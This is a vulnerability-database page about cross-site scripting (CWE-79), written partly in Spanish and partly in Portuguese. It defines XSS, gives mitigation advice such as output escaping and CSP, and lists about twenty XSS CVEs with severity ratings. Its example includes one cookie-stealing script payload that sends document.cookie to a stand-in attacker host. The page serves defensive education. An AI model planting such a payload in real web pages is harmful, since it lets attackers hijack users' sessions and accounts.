Fallos del tipo CWE-79

29.147 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-2719LOWCampcodes Complete Online DJ Booking System admin-profile.php cross site scriptingEPSS 0.5%CVE-2023-3561LOWGZ Scripts PHP GZ Hotel Booking Script load.php cross site scriptingEPSS 0.5%CVE-2023-3562LOWGZ Scripts PHP CRM Platform index.php cross site scriptingEPSS 0.5%CVE-2024-10172MEDIUMWPBakery Visual Composer WHMCS Elements <= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via void_wbwhmcse_laouts_search ShortcodeEPSS 0.5%CVE-2025-40651MEDIUMReflected Cross Site Scripting (XSS) in Real Easy StoreEPSS 0.5%CVE-2023-40024MEDIUMReflected Cross-Site Scripting (XSS) in scancode.io license endpointEPSS 0.5%CVE-2023-3556LOWGZ Scripts Car Listing Script PHP preview.php cross site scriptingEPSS 0.5%CVE-2023-3563LOWGZ Scripts GZ E Learning Platform URL Parameter cross site scriptingEPSS 0.5%CVE-2024-2717LOWCampcodes Complete Online DJ Booking System booking-search.php cross site scriptingEPSS 0.5%CVE-2024-2718LOWCampcodes Complete Online DJ Booking System booking-bwdates-reports-details.php cross site scriptingEPSS 0.5%CVE-2023-3558LOWGZ Scripts Event Booking Calendar load.php cross site scriptingEPSS 0.5%CVE-2024-6783MEDIUMVue client-side XSS via prototype pollutionEPSS 0.5%CVE-2023-5541LOWMoodle: xss risk when using csv grade import methodEPSS 0.5%CVE-2023-4652MEDIUMCross-site Scripting (XSS) - Stored in instantsoft/icms2EPSS 0.5%CVE-2023-28415MEDIUMWordPress Side Cart Woocommerce (Ajax) Plugin <= 2.2 is vulnerable to Cross Site Scripting (XSS)EPSS 0.5%CVE-2026-42235HIGHn8n: XSS via MCP OAuth clientEPSS 0.5%CVE-2026-85677HIGHGutenverse News < 3.3.3 - Unauthenticated Stored XSS via Comment ContentEPSS 0.5%CVE-2026-81807HIGHSimple Ajax Chat < 20260827 - Unauthenticated Stored XSS via Chat Message LinkificationEPSS 0.5%CVE-2023-5581LOWSourceCodester Medicine Tracker System index.php cross site scriptingEPSS 0.5%CVE-2026-76982MEDIUMApache Wicket: XSS in Button via its model objectEPSS 0.5%